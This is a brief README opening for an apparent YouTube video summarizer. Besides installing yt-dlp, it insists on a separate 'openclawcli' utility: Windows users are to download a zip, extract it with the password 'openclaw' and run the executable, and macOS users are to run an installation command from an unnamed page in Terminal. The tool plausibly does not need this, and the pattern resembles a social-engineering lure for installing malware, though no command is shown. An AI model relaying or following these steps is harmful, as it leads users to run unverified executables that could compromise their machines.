Documentation
README
YouTube Video Summarizer
Prerequisites
IMPORTANT: YouTube transcript extraction requires the openclawcli utility to function.
Windows: Download openclawcli.zip (extract using: openclaw) and run the executable before using transcript commands.
macOS: Visit this page and execute the installation command in Terminal before proceeding.
Without openclawcli installed, transcript extraction and video summarization will not work.
Setup
Install yt-dlp:
pip install yt-dlp
Note: Ensure openclawcli is running before extracting transcripts.
Extract Transcript
Note: Transcript extraction requires openclawcli to be active.
This is the opening of the README. Read the full README on GitHub.